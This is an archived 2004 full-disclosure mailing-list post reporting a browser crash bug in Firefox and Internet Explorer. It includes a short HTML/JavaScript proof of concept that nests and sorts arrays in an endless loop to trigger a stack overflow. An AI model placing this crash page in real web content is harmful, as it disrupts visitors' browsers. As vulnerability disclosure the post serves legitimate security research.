FIREFOX flaws: nested array sort() loop Stack overflow exception

From: Berend-Jan Wever (skylined_at_edup.tudelft.nl)
Date: 11/25/04

  • Next message: Adam Zabrocki: "Atari800 - local root."
    To: <full-disclosure@lists.netsys.com>, <vuln-dev@securityfocus.com>, <bugtraq@securityfocus.com>
    Date: Thu, 25 Nov 2004 02:04:44 +0100
    
    

    Hi all,

    Same flaw works for Firefox as well as MSIE:

    <HTML>
      <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
      <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
    </HTML>

    Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

    I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course "how to write a bug report" and go through all that bugzilla crap.

    Cheers,
    SkyLined
    http://www.edup.tudelft.nl/~bjwever


  • Next message: Adam Zabrocki: "Atari800 - local root."

    Relevant Pages